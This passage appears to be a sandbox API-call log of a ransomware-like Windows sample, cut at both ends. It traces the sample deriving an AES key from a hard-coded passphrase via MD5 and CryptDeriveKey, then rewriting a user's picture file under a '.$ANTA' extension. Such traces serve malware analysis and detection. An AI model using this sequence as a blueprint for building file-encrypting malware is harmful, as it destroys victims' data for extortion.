dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0090.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0090.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0090.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0090.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0090.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0090.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0090.051] CloseHandle (hObject=0x298) returned 1 [0090.051] FreeLibrary (hLibModule=0x772d0000) returned 1 [0090.052] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0090.052] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e0f0e0, ftCreationTime.dwHighDateTime=0x1d5e9a3, ftLastAccessTime.dwLowDateTime=0x913d65f0, ftLastAccessTime.dwHighDateTime=0x1d5e47e, ftLastWriteTime.dwLowDateTime=0x913d65f0, ftLastWriteTime.dwHighDateTime=0x1d5e47e, nFileSizeHigh=0x0, nFileSizeLow=0x1744a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="Rk8a.png", cAlternateFileName="")) returned 0x41ac600 [0090.052] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0090.052] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0090.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0090.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.052] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0090.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0090.053] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0090.054] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0090.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0090.054] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0090.054] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0090.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.054] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0090.054] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.054] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0090.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca760, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0090.054] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0090.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0090.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0090.054] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0090.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0090.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0090.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca760, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0090.055] CryptHashData (hHash=0x41ac640, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0090.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.055] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0090.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0090.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca6d0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0090.055] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac780) returned 1 [0090.055] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0090.056] CryptDestroyHash (hHash=0x41ac640) returned 1 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0090.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0090.057] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0090.057] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0090.057] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0090.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0090.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0090.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0090.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.058] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rk8a.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0090.058] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.058] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0090.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0090.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0090.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0090.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0090.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0090.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0090.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.058] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0090.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0090.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0090.059] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0090.059] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0090.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0090.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0090.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0090.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0090.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0090.061] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0090.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0090.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0090.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0090.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.062] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\rk8a.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0090.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0090.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0090.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0090.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0090.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.063] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0090.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0090.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0090.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.063] HeapFree 